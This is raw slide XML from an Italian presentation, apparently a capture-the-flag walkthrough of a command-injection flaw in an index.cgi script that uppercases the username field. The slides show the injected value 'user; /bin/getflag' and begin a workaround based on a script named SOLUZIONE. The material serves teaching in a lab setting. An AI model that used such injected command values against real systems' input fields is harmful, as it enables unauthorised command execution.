        <p:nvCxnSpPr>
          <p:cNvPr id="3361" name="Google Shape;3361;p79"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="3363" idx="3"/>
            <a:endCxn id="3383" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1988588" y="2070300"/>
            <a:ext cx="1253450" cy="5620"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3362" name="Google Shape;3362;p79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6580213" y="2453467"/>
            <a:ext cx="1809600" cy="42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chemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>
              </a:rPr>
              <a:t>FASE 4</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Bebas Neue"/>
              <a:ea typeface="Bebas Neue"/>
              <a:cs typeface="Bebas Neue"/>
              <a:sym typeface="Bebas Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3363" name="Google Shape;3363;p79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1340888" y="1752070"/>
            <a:ext cx="647700" cy="6477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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5180755" y="1742695"/>
            <a:ext cx="655200" cy="6552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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3242038" y="1741050"/>
            <a:ext cx="658500" cy="6585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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7152638" y="1752061"/>
            <a:ext cx="647700" cy="6477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361;p79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0ECE2AF5-19E0-A4C9-3AA0-41C51C520550}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="3383" idx="3"/>
            <a:endCxn id="3382" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3900538" y="2070295"/>
            <a:ext cx="1280217" cy="5"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="Google Shape;3361;p79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CC963F1-41A0-9370-C4CF-DD5E68DC0D2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="3382" idx="3"/>
            <a:endCxn id="3384" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5835955" y="2070295"/>
            <a:ext cx="1316683" cy="5616"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Immagine 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CBACE8E-E616-870A-E730-BA8831DBF38F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5266641" y="1806063"/>
            <a:ext cx="490818" cy="490819"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Immagine 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D851669-A401-E808-490E-156A38E5F5E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3327924" y="1802233"/>
            <a:ext cx="501677" cy="501677"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Immagine 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA36799A-6B1E-01F9-2B52-1FFE10FDB8D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7226377" y="1815038"/>
            <a:ext cx="529262" cy="529262"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Immagine 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58F51EAE-4E47-5F75-0DE8-05EB8BBA5EAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1411617" y="1794096"/>
            <a:ext cx="550204" cy="550204"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="302406702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63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3363"/>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54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="335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355"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="335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361"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3361"/>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56"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="335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357"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="335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83"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="338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wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="31"/>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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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382"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="338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359"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="335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358"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="335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wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:child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fade">
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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360"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="64" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="336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362"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="67" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="336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384"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="70" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33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4" grpId="0"/>
      <p:bldP spid="3355" grpId="0"/>
      <p:bldP spid="3356" grpId="0"/>
      <p:bldP spid="3357" grpId="0"/>
      <p:bldP spid="3358" grpId="0"/>
      <p:bldP spid="3359" grpId="0"/>
      <p:bldP spid="3360" grpId="0"/>
      <p:bldP spid="3362" grpId="0"/>
      <p:bldP spid="3363" grpId="0" animBg="1"/>
      <p:bldP spid="3382" grpId="0" animBg="1"/>
      <p:bldP spid="3383" grpId="0" animBg="1"/>
      <p:bldP spid="338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91"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1994" name="Google Shape;1994;p64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="458438"/>
            <a:ext cx="77040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5" name="Google Shape;1995;p64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="633263"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1996" name="Google Shape;1996;p64"/>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4"/>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4"/>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9" name="Google Shape;1999;p64"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1360696" y="495730"/>
            <a:ext cx="6412200" cy="572700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="it-IT" sz="3200"/>
              <a:t>Cosa É andato storto?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2001" name="Google Shape;2001;p64"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="772534" y="1187710"/>
            <a:ext cx="8122083" cy="469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400" dirty="0"/>
              <a:t>Riguardando meglio il codice sorgente di index.cgi ci ricordiamo di questa riga importante:</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="image9.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{912EA72B-6193-A36A-6F10-9C761406CF19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect t="25760" r="53314" b="66350"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1620767" y="1618090"/>
            <a:ext cx="5892059" cy="585514"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71A21905-7EF9-9BC5-9EE8-C7C9BB7240C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="2456036"/>
            <a:ext cx="7795866" cy="66875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0" indent="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Ogni input passato ad username viene convertito in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>maiuscolo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>, quindi il comando che viene eseguito non è:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>“user; /bin/getflag” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>MA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> “USER; /BIN/GETFLAG”. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7B870CF-48E9-49A9-500D-FC18C5210A60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629288" y="3478969"/>
            <a:ext cx="7875019" cy="66875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0" indent="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>I comandi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1"/>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t> sono </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>CASE SENSITIVE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>e i nomi delle cartelle in Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>NON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t> sono scritte in maiuscolo. Inoltre anche il nome del file “getflag” è scritto in minuscolo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>.  </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01">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="200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xEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10">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xEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="25"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450" name="Google Shape;1450;p54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1408693" y="499658"/>
            <a:ext cx="64122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it-IT" sz="3200"/>
              <a:t>soluzione</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1468" name="Google Shape;1468;p54"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1469" name="Google Shape;1469;p54"/>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4"/>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4"/>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1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{877D37DB-FB3A-72A7-5ABB-F02B538D2D79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713594" y="1156181"/>
            <a:ext cx="7578315" cy="56048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152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Per aggirare il problema del file minuscolo, creiamo uno script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> che conterrà il comando /bin/getflag e lo facciamo eseguire da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>index.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{966163DA-3F2E-9621-2A6E-34DA9BC5824B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="881053" y="1787403"/>
            <a:ext cx="7902729" cy="56048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152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Creiamo il file SOLUZIONE:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>$ touch SOLUZIONE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
